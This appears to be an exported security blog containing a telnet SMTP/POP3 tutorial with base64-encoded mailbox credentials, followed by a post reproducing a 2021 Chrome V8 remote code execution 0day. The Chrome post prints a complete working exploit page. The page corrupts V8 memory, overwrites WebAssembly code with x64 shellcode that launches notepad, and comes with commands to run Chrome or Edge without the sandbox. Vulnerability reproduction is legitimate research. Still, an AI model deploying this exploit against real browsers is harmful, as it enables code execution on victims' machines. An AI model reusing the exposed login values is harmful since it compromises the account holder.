<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">telnet smtp.163.com 25 <span class="comment"># connect with telnet; port 25 is plaintext, so everything below, including the base64 credentials, crosses the wire unencrypted unless STARTTLS is negotiated</span></span><br><span class="line">220 163.com Anti-spam GT <span class="keyword">for</span> Coremail System (163com[20141201])</span><br><span class="line">helo 163.com <span class="comment"># the argument after helo can be any string. EHLO is the Extended SMTP (ESMTP) verb (RFC 1869, carried into RFC 2821): an ESMTP server answers it by advertising its capabilities, such as the maximum accepted message size and the supported authentication methods. HELO is the older verb from RFC 821; most servers support both. AUTH is itself an ESMTP extension, so strictly it should follow EHLO, but this server accepts it after HELO too.</span></span><br><span class="line">250 OK</span><br><span class="line">auth login <span class="comment"># start AUTH LOGIN; the two 334 prompts below are just base64("Username:") and base64("Password:")</span></span><br><span class="line">334 dXNlcm5hbWU6</span><br><span class="line">aXR4aWFvd2VpNzU1 <span class="comment"># mailbox username, base64-encoded</span></span><br><span class="line">334 UGFzc3dvcmQ6</span><br><span class="line">VUdFRVhRU0hGS0dBQ1hJRA== <span class="comment"># mailbox password (or the provider's authorization code), base64-encoded</span></span><br><span class="line">235 Authentication successful</span><br><span class="line">mail from:<itxiaowei755@163.com> <span class="comment"># envelope sender (the address SPF is checked against)</span></span><br><span class="line">250 Mail OK</span><br><span class="line">rcpt to:<79898326@qq.com> <span class="comment"># envelope recipient</span></span><br><span class="line">250 Mail OK</span><br><span class="line">data <span class="comment"># start the message: headers, a blank line, then the body</span></span><br><span class="line">354 End data with <CR><LF>.<CR><LF></span><br><span class="line">from:itxiaowei755@163.com <span class="comment"># From header; the server does not require it to match MAIL FROM, and this is what the inbox shows as the sender (only DMARC alignment ties the two together)</span></span><br><span class="line">to:79898326@qq.com <span class="comment"># To header; also free-form, shown as the recipient in the inbox</span></span><br><span class="line">date:10/10/2021 <span class="comment"># Date header; RFC 5322 expects the form "Wed, 14 Apr 2021 09:34:14 +0800", many servers accept sloppier values</span></span><br><span class="line">subject:hello smtp <span class="comment"># Subject header</span></span><br><span class="line"> <span class="comment"># the blank line separates the headers from the body</span></span><br><span class="line">tyachedtothisletter.Imnowwritingtoaskifyoucanwriteareferencefor... <span class="comment"># body text</span></span><br><span class="line">. <span class="comment"># a line holding only "." followed by Enter ends the message and submits it (a body line that itself starts with "." must be typed with a doubled "..")</span></span><br><span class="line">250 Mail OK queued as smtp7,C8CowABnYuAHRnZgpUBPXA--.60300S2 1618364054 <span class="comment"># 250 means the message was accepted into the queue</span></span><br><span class="line">quit <span class="comment"># close the session</span></span><br></pre></td></tr></table></figure>
<h5 id="pop3"><a href="#pop3" class="headerlink" title="pop3"></a>pop3</h5><p><img src="/img/Telnet%20SMTP/image-20210413180236367.png" alt="image-20210413180236367"></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">telnet pop.163.com 110 <span class="comment"># connect with telnet</span></span><br><span class="line">user **** <span class="comment"># username</span></span><br><span class="line">pass **** <span class="comment"># password</span></span><br><span class="line">+OK 24 message(s) [643260 byte(s)] <span class="comment"># on success the server replies +OK; 24 is the number of messages and 643260 the total size of all messages in bytes</span></span><br><span class="line"></span><br><span class="line">Command list</span><br><span class="line"><span class="built_in">stat</span> <span class="comment"># show statistics; the POP3 server responds with a positive reply that starts with "+OK" followed by two numbers: the message count and the total message size</span></span><br><span class="line">list <span class="comment"># syntax: list [n]; n is optional and is the message number; list the messages</span></span><br><span class="line">uidl <span class="comment"># syntax: uidl [n]; n is optional and is the message number; show the unique message identifier</span></span><br><span class="line">retr <span class="comment"># syntax: retr [n]; n is optional and is the message number; show the content of a message</span></span><br><span class="line">dele <span class="comment"># syntax: dele [n]; n is optional and is the message number; delete the specified message (note: dele n only marks the message for deletion; it is really deleted only after the quit command is executed)</span></span><br><span class="line">top <span class="comment"># syntax: top [n][m]; n and m are required, n is the message number and m the line count; read m lines of the specified message's body; with m=0 only the message headers are returned</span></span><br><span class="line">noop <span class="comment"># the POP3 server performs no action and just returns a positive "+OK" response</span></span><br><span class="line">quit <span class="comment"># quit</span></span><br></pre></td></tr></table></figure>
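<p>The reply handling behind the SMTP telnet session above, as an added example that is not part of the original post: it parses single- and multi-line SMTP replies, picks out the enhanced status codes (RFC 3463) that appear in the error-code list below, classifies 4xx replies as transient and 5xx as permanent, decodes the base64 334 challenges of AUTH LOGIN, and dot-stuffs a body before DATA so that a body line consisting of "." cannot end the message early. All sample replies in it are constructed for the example, not captured from the 163.com server.</p>

```python
import base64
import re

# Reply line: 3-digit code, then "-" (more lines follow) or " " (last line), then text.
# RFC 5321 also allows a bare code with no text, so separator and text are optional.
REPLY_RE = re.compile(r"^(\d{3})(?:([ -])(.*))?$")
# Enhanced status code (RFC 3463) at the start of the text, written "#4.4.5" or
# "5.7.0" in the server replies and in the error-code list quoted in this post.
ENHANCED_RE = re.compile(r"^#?([245]\.\d{1,3}\.\d{1,3})\s*")

# The first digit of the reply code decides what a client should do next.
CATEGORY = {
    "2": "success",        # e.g. 235 auth ok, 250 Mail OK
    "3": "intermediate",   # e.g. 334 AUTH challenge, 354 start mail input
    "4": "transient",      # retry later (421, 451, 452, 454)
    "5": "permanent",      # do not retry unchanged (500-554)
}


def parse_reply(raw):
    """Parse one complete SMTP reply, single- or multi-line ("250-..." lines).

    Returns (code, category, enhanced_status_or_None, [text lines]).
    Raises ValueError on anything malformed so a caller fails closed rather
    than guessing what the server meant.
    """
    lines = raw.splitlines()
    if not lines:
        raise ValueError("empty reply")
    code, texts = None, []
    for i, line in enumerate(lines):
        m = REPLY_RE.match(line)
        if not m:
            raise ValueError("malformed reply line: %r" % line)
        if code is None:
            code = m.group(1)
        elif m.group(1) != code:
            raise ValueError("inconsistent codes in multi-line reply")
        sep = m.group(2) or " "
        is_last = i == len(lines) - 1
        if (sep == " ") != is_last:
            raise ValueError("continuation marker does not match line position")
        texts.append(m.group(3) or "")
    enhanced = None
    em = ENHANCED_RE.match(texts[0])
    if em:
        enhanced = em.group(1)
        texts[0] = texts[0][em.end():]
    return code, CATEGORY.get(code[0], "unknown"), enhanced, texts


def decode_auth_login_challenge(reply):
    """Decode the base64 prompt carried by a 334 reply during AUTH LOGIN."""
    code, _, _, texts = parse_reply(reply)
    if code != "334":
        raise ValueError("expected a 334 challenge, got %s" % code)
    return base64.b64decode(texts[0].strip(), validate=True).decode("ascii")


def auth_login_response(value):
    """Encode a credential the way the client answers each 334 challenge."""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def dot_stuff(body):
    """Prepare a body for DATA: CRLF endings, leading "." doubled, then the terminator.

    Without the doubling, a body line consisting of a single "." would end the
    DATA phase early and the rest of the body would be read as SMTP commands.
    """
    out = []
    for line in body.split("\n"):
        line = line.rstrip("\r")
        if line.startswith("."):
            line = "." + line
        out.append(line)
    return "\r\n".join(out) + "\r\n.\r\n"


if __name__ == "__main__":
    # Constructed sample replies modelled on the session above (not captured output).
    for sample in ("220 163.com Anti-spam GT for Coremail System",
                   "250-163.com\r\n250-PIPELINING\r\n250 8BITMIME",
                   "421 #4.4.5 Too many connections from your host",
                   "530 #5.7.0 Must issue a STARTTLS command first"):
        print(parse_reply(sample))
    print(decode_auth_login_challenge("334 dXNlcm5hbWU6"))
```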
<h5 id="错误代码"><a href="#错误代码" class="headerlink" title="错误代码"></a>Error codes</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">4xx codes:</span><br><span class="line"> <span class="number">421</span> #4.4.5 Too many TLS sessions at this time</span><br><span class="line"> <span class="number">421</span> #4.4.5 Too many connections from your host</span><br><span class="line"> <span class="number">421</span> #4.4.5 Too many connections to this host</span><br><span class="line"> <span class="number">421</span> #4.4.5 Too many connections to this listener</span><br><span class="line"> <span class="number">421</span> #4.x.2 Too many messages for this session</span><br><span class="line"> <span class="number">421</span> <hostname> Service not available, closing transmission channel</span><br><span class="line"> <span class="number">421</span> Allowed connection time exceeded</span><br><span class="line"> <span class="number">421</span> Bad SMTP command limit exceeded, disconnecting</span><br><span class="line"> <span class="number">421</span> Evaluation license timeout</span><br><span class="line"> <span class="number">451</span> #4.3.0 Server error</span><br><span class="line"> <span class="number">452</span> #4.3.1 Queue full</span><br><span class="line"> <span class="number">452</span> #4.3.1 Server resources low, try again later</span><br><span class="line"> <span class="number">452</span> #4.3.1 Temporary system error (12)</span><br><span class="line"> <span class="number">452</span> #4.5.3 Too many recipients</span><br><span class="line"> <span class="number">454</span> TLS not available due to a temporary reason</span><br><span class="line"></span><br><span class="line">5xx codes:</span><br><span class="line"> <span class="number">500</span> #5.5.1 Command not recognized</span><br><span class="line"> <span class="number">500</span> Line too long</span><br><span class="line"> <span class="number">501</span> #5.0.0 EHLO requires domain address</span><br><span class="line"> <span class="number">501</span> #5.5.2 Syntax error XXX</span><br><span class="line"> <span class="number">501</span> #5.5.4 Invalid argument to AUTH command</span><br><span class="line"> <span class="number">501</span> Unknown xxx command</span><br><span class="line"> <span class="number">501</span> Unknown option XXX</span><br><span class="line"> <span class="number">501</span> Unknown value XXX</span><br><span class="line"> <span class="number">503</span> #5.3.3 AUTH not available</span><br><span class="line"> <span class="number">503</span> #5.5.0 AUTH not permitted during mail transaction</span><br><span class="line"> <span class="number">503</span> #5.5.0 Already authenticated</span><br><span class="line"> <span class="number">503</span> #5.5.1 MAIL first</span><br><span class="line"> <span class="number">503</span> #5.5.1 RCPT first</span><br><span class="line"> <span class="number">503</span> Bad sequence of commands: DATA inside mailmerge transaction</span><br><span class="line"> <span class="number">503</span> Bad sequence of commands: XPRT inside non-formatted transaction</span><br><span class="line"> <span class="number">503</span> Bad sequence of commands: now receiving parts</span><br><span class="line"> <span class="number">503</span> Not in mailmerge transaction</span><br><span class="line"> <span class="number">504</span> #5.5.1 AUTH mechanism XXX not available</span><br><span class="line"> <span class="number">504</span> Command parameter XXX not recognized</span><br><span class="line"> <span class="number">504</span> Invalid XDFN syntax</span><br><span class="line"> <span class="number">504</span> Invalid part number</span><br><span class="line"> <span class="number">504</span> Invalid part number XXX</span><br><span class="line"> <span class="number">504</span> No variable value specified</span><br><span class="line"> <span class="number">504</span> Other parts still missing</span><br><span class="line"> <span class="number">504</span> Reserved variable name</span><br><span class="line"> <span class="number">504</span> Syntax error in *parts syntax</span><br><span class="line"> <span class="number">504</span> XDFN command cannot contain null characters</span><br><span class="line"> <span class="number">530</span> #5.7.0 Must issue a STARTTLS command first</span><br><span class="line"> <span class="number">530</span> #5.7.0 This sender must issue a STARTTLS command first</span><br><span class="line"> <span class="number">530</span> Authentication required</span><br><span class="line"> <span class="number">538</span> #5.7.11 Encryption required</span><br><span class="line"> <span class="number">552</span> #5.3.4 Message header size exceeds limit</span><br><span class="line"> <span class="number">552</span> #5.3.4 Message size exceeds limit</span><br><span class="line"> <span class="number">552</span> Size limit exceeded</span><br><span class="line"> <span class="number">554</span> #5.3.0 Server error</span><br><span class="line"> <span class="number">554</span> Too many hops</span><br><span class="line"> <span class="number">554</span> Message subject contains illegal bare CR/LF characters.</span><br></pre></td></tr></table></figure>]]></content>
<tags>
<tag>mail</tag>
</tags>
</entry>
<entry>
<title>chrome 0day remote code execution</title>
<url>/2021/04/14/chrome-0day0414/</url>
<content><![CDATA[<p>This article is for technical research and discussion only; it must not be used for any illegal purpose, and you alone bear all consequences that may arise from doing so.</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h4><p>On 14 April 2021, a POC for a 0day remote code execution vulnerability in the Chrome V8 engine was published on the internet. An attacker can exploit it to obtain remote code execution by crafting a specially constructed web page and luring the victim into visiting it.</p>
<p>Google Chrome is a free web browser developed by Google. Many third-party browsers use the Chromium engine, and those browsers are affected by this 0day vulnerability as well.</p>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>Affected versions</h4><p>Google Chrome <= 90.0.4430.72</p>
<a id="more"></a>
<p>Chromium-based Microsoft Edge <= 89.0.774.77</p>
<p>Other third-party browsers based on the V8 engine</p>
<h4 id="版本介绍"><a href="#版本介绍" class="headerlink" title="版本介绍"></a>Version information</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Google Chrome v90<span class="number">.0</span><span class="number">.4430</span><span class="number">.72</span></span><br><span class="line">Microsoft Edge v89<span class="number">.0</span><span class="number">.774</span><span class="number">.77</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome-0day0414/image-20210415113316603.png" alt="image-20210415113316603"></p>
<p><img src="/img/chrome-0day0414/image-20210415113459461.png" alt="image-20210415113459461"></p>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Vulnerability reproduction</h4><p>exp.html</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">gc</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x80000</span>; ++i) {</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> a = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>();</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> shellcode = [<span class="number">0xFC</span>, <span class="number">0x48</span>, <span class="number">0x83</span>, <span class="number">0xE4</span>, <span class="number">0xF0</span>, <span class="number">0xE8</span>, <span class="number">0xC0</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x41</span>, <span class="number">0x51</span>, <span class="number">0x41</span>, <span class="number">0x50</span>, <span class="number">0x52</span>, <span class="number">0x51</span>,</span></span><br><span class="line"> 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,</span><br><span class="line"> 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,</span><br><span class="line"> 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,</span><br><span class="line"> 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,</span><br><span class="line"> 0x00, 0x00, 0x00, 
0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,</span><br><span class="line"> 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,</span><br><span class="line"> 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,</span><br><span class="line"> 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,</span><br><span class="line"> 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,</span><br><span class="line"> 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,</span><br><span class="line"> 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,</span><br><span class="line"> 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,</span><br><span class="line"> 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,</span><br><span class="line"> 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,</span><br><span class="line"> 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,</span><br><span class="line"> 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,</span><br><span class="line"> 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00];</span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="built_in">Uint8Array</span>([<span class="number">0</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, 
<span class="number">133</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">127</span>, <span class="number">3</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">112</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">131</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">6</span>, <span class="number">129</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">145</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">6</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">109</span>, <span class="number">111</span>, <span class="number">114</span>, <span class="number">121</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">109</span>, <span 
class="number">97</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">138</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">65</span>, <span class="number">42</span>, <span class="number">11</span>]);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> wasmModule = <span class="keyword">new</span> WebAssembly.Module(wasmCode);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> wasmInstance = <span class="keyword">new</span> WebAssembly.Instance(wasmModule);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> main = wasmInstance.exports.main;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> bf = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">8</span>);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> bfView = <span class="keyword">new</span> <span class="built_in">DataView</span>(bf);</span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">fLow</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> 
(bfView.getUint32(<span class="number">0</span>, <span class="literal">true</span>));</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">fHi</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> (bfView.getUint32(<span class="number">4</span>, <span class="literal">true</span>))</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">i2f</span><span class="params">(low, hi)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setUint32(<span class="number">0</span>, low, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> bfView.setUint32(<span class="number">4</span>, hi, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getFloat64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">f2big</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getBigUint64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span 
class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">big2f</span><span class="params">(b)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setBigUint64(<span class="number">0</span>, b, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getFloat64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="class"><span class="keyword">class</span> <span class="title">LeakArrayBuffer</span> <span class="keyword">extends</span> <span class="title">ArrayBuffer</span> </span>{</span></span><br><span class="line"><span class="javascript"> <span class="keyword">constructor</span>(size) {</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">super</span>(size);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">this</span>.slot = <span class="number">0xb33f</span>;</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">foo</span><span class="params">(a)</span> </span>{</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> x = <span class="number">-1</span>;</span></span><br><span class="line"> if (a) x = 0xFFFFFFFF;</span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> arr = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="built_in">Math</span>.sign(<span class="number">0</span> - <span class="built_in">Math</span>.max(<span class="number">0</span>, x, <span class="number">-1</span>)));</span></span><br><span class="line"> 
arr.shift();</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> local_arr = <span class="built_in">Array</span>(<span class="number">2</span>);</span></span><br><span class="line"><span class="actionscript"> local_arr[<span class="number">0</span>] = <span class="number">5.1</span>;<span class="comment">//4014666666666666</span></span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> buff = <span class="keyword">new</span> LeakArrayBuffer(<span class="number">0x1000</span>);<span class="comment">//byteLength idx=8</span></span></span><br><span class="line"> arr[0] = 0x1122;</span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> [arr, local_arr, buff];</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i)</span></span><br><span class="line"><span class="actionscript"> foo(<span class="literal">false</span>);</span></span><br><span class="line"> gc(); gc();</span><br><span class="line"><span class="actionscript"> [corrput_arr, rwarr, corrupt_buff] = foo(<span class="literal">true</span>);</span></span><br><span class="line"> corrput_arr[12] = 0x22444;</span><br><span class="line"><span class="actionscript"> <span class="keyword">delete</span> corrput_arr;</span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">setbackingStore</span><span class="params">(hi, low)</span> </span>{</span></span><br><span class="line"> rwarr[4] = i2f(fLow(rwarr[4]), hi);</span><br><span class="line"> rwarr[5] = i2f(low, fHi(rwarr[5]));</span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span 
class="title">leakObjLow</span><span class="params">(o)</span> </span>{</span></span><br><span class="line"> corrupt_buff.slot = o;</span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> (fLow(rwarr[<span class="number">9</span>]) - <span class="number">1</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> corrupt_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(corrupt_buff);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> idx0Addr = corrupt_buffer_ptr_low - <span class="number">0x10</span>;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseAddr = (corrupt_buffer_ptr_low & <span class="number">0xffff0000</span>) - ((corrupt_buffer_ptr_low & <span class="number">0xffff0000</span>) % <span class="number">0x40000</span>) + <span class="number">0x40000</span>;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> delta = baseAddr + <span class="number">0x1c</span> - idx0Addr;</span></span><br><span class="line"> if ((delta % 8) == 0) {</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseIdx = delta / <span class="number">8</span>;</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">this</span>.base = fLow(rwarr[baseIdx]);</span></span><br><span class="line"><span class="actionscript"> } <span class="keyword">else</span> {</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseIdx = ((delta - (delta % <span class="number">8</span>)) / <span class="number">8</span>);</span></span><br><span class="line"><span 
class="actionscript"> <span class="keyword">this</span>.base = fHi(rwarr[baseIdx]);</span></span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> wasmInsAddr = leakObjLow(wasmInstance);</span></span><br><span class="line"><span class="actionscript"> setbackingStore(wasmInsAddr, <span class="keyword">this</span>.base);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> code_entry = corrupt_view.getFloat64(<span class="number">13</span> * <span class="number">8</span>, <span class="literal">true</span>);</span></span><br><span class="line"> setbackingStore(fLow(code_entry), fHi(code_entry));</span><br><span class="line"><span class="javascript"> <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i < shellcode.length; i++) {</span></span><br><span class="line"> corrupt_view.setUint8(i, shellcode[i]);</span><br><span class="line"> }</span><br><span class="line"> main();</span><br><span class="line"><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure>
<p>Disable the browser sandbox</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line"># exit the browser process first, then launch it as follows</span><br><span class="line">Chrome:</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" -no-sandbox</span><br><span class="line">or</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" --args --no-sandbox</span><br><span class="line"></span><br><span class="line">Edge:</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\M</span>icrosoft<span class="symbol">\E</span>dge<span class="symbol">\A</span>pplication<span class="symbol">\m</span>sedge.exe" -no-sandbox</span><br><span class="line">or</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\M</span>icrosoft<span class="symbol">\E</span>dge<span class="symbol">\A</span>pplication<span class="symbol">\m</span>sedge.exe" --args --no-sandbox</span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome-0day0414/image-20210415114004777.png" alt="image-20210415114004777"></p>
<p>Notepad pops up</p>
<p><img src="/img/chrome-0day0414/image-20210415114255029.png" alt="image-20210415114255029"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://github.com/avboy1337/1195777-chrome0day" target="_blank" rel="noopener">https://github.com/avboy1337/1195777-chrome0day</a></p>
<p><a href="https://mp.weixin.qq.com/s/gVBsX62O3qaF4JxLsIGI5Q" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/gVBsX62O3qaF4JxLsIGI5Q</a></p>
]]></content>
<tags>
<tag>Vulnerability reproduction</tag>
</tags>
</entry>
<entry>
<title>Chrome remote code execution vulnerability</title>
<url>/2021/04/13/chrome%200day/</url>
<content><![CDATA[<p>This article is for technical research and discussion only; it must not be used for any illegal purpose, and you alone bear all consequences that may arise from doing so.</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h4><p>On 13 April 2021, a security researcher abroad was found to have published the POC details of a Chrome remote code execution 0Day.</p>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>Affected versions</h4><p>Google Chrome: <=89.0.4389.114</p>
<p>Other browsers based on the Chrome engine</p>
<a id="more"></a>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>Environment</h4><p>Google Chrome: 89.0.4389.114</p>
<p><img src="/img/chrome%200day/image-20210413161555848.png" alt="image-20210413161555848"></p>
